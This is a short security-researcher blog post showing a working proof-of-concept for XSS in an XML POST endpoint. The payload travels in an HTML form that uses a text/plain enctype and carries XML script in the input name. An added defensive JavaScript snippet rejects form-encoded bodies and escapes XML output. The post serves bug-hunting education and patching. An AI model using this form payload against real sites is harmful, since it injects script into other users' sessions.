@zseano
UK Security Researcher



A site containing various blog posts, tutorials, tools and information regarding working with me.




XML XSS via POST


I was bug hunting on a site which looked like this:

POST /snip/snippet.php HTTP/1.1
<?xml version="1.0"?>xml_here

I tested in Burp for XSS in XML, and it worked. Now I had to get this to work via a browser. I was a bit stuck on sending XML in an HTML form POST and Google didn’t yield me any results, but I worked out how. Below is my PoC:
<html>
  <body>
    <!-- text/plain sends the body as name=value without URL-encoding, so the XML in the input name arrives intact -->
    <form ENCTYPE="text/plain" action="http://vulnsite.com/snip/snippet.php" method="post">
      <input type="hidden" name="<foo> <html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script>alert(1);</html:script> </html> </foo>">
      <input type="submit" value="submit">
    </form>
  </body>
</html>

Upon pressing “Submit”, the XSS in the XML is sent, and executes. And there we have it.. XSS in an XML post via an HTML form. Turns out adding the input name as the XSS will allow it to be executed. Note: Turns out all endpoints on the target site are vulnerable to this.. they’re going to have fun patching this. ;)
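
On the patching side, an added example (not code from the original post or from the target site): a request guard for an XML endpoint that refuses the three body encodings an HTML form can produce, plus output escaping for anything echoed into an XML response. The function names, the sample requests and the assumption that legitimate clients send `application/xml` or `text/xml` are all hypothetical.

```javascript
// Added example: guard for an endpoint that expects a raw XML POST body.
// Assumes header names are already lower-cased, as Node's http module does.

// The only body encodings an HTML <form> can produce.
const FORM_ENCTYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);
const XML_TYPES = new Set(['application/xml', 'text/xml']);

function mediaType(header) {
  return String(header || '').split(';')[0].trim().toLowerCase();
}

// A text/plain form serialises each field as name=value CRLF. With the XML
// carried in the field name and an empty value, the body is XML plus "=".
function looksLikeFormCarriedXml(body) {
  return /^\s*<[\s\S]*=\r?\n?$/.test(body);
}

// Decide whether the XML parser should ever see this request.
function checkXmlRequest(headers, body) {
  const type = mediaType(headers['content-type']);
  if (FORM_ENCTYPES.has(type)) {
    const reason = looksLikeFormCarriedXml(body) ? 'xml-in-form-field-name' : 'form-enctype';
    return { accept: false, reason };
  }
  if (!XML_TYPES.has(type)) return { accept: false, reason: 'not-xml-content-type' };
  return { accept: true, reason: 'ok' };
}

// Escape request-derived text before echoing it into an XML response, so
// markup in the input stays text instead of becoming elements.
function escapeXml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&apos;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Constructed sample requests (not captured traffic).
const formPost = { headers: { 'content-type': 'text/plain' }, body: '<foo><a>1</a></foo>=\r\n' };
const apiPost = { headers: { 'content-type': 'application/xml; charset=utf-8' }, body: '<foo><a>1</a></foo>' };
console.log(checkXmlRequest(formPost.headers, formPost.body));
console.log(checkXmlRequest(apiPost.headers, apiPost.body));
console.log(escapeXml('<html:script>'));
```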